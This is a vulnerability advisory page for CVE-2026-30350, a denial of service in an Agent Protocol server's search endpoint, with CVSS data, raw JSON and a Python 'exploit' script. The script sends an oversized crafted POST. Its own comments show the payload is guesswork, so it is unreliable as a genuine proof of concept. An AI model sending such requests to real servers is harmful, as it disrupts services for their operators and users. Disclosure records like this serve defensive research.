Security Vulnerability Report
中文
CVE-2026-30350 CVSS 7.5 HIGH

CVE-2026-30350

Published: 2026-04-27 15:16:09
Last Modified: 2026-04-27 21:16:33

Description

An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Agent Protocol (commit e9a89f)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL configuration target_url = "http://target-ip:port/store/items/search" # Crafted malicious payload based on vulnerability description # The specific payload structure depends on the parsing logic of the vulnerable commit malicious_payload = { "malicious_param": "overflow_data" * 10000, "nested_structure": {"a": {"b": {"c": "deep_nest"}}} } try: print(f"Sending exploit request to {target_url}...") response = requests.post(target_url, json=malicious_payload, timeout=5) print(f"Response Status Code: {response.status_code}") print("If the server hangs or crashes, the DoS exploit was successful.") except requests.exceptions.Timeout: print("Request timed out - possible Denial of Service triggered.") except Exception as e: print(f"An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30350", "sourceIdentifier": "[email protected]", "published": "2026-04-27T15:16:08.570", "lastModified": "2026-04-27T21:16:33.383", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://gist.github.com/syphonetic/d27b5965c884555acea1827988689f7d", "source": "[email protected]"}, {"url": "https://github.com/ibbybuilds/aegra/tree/main", "source": "[email protected]"}]}}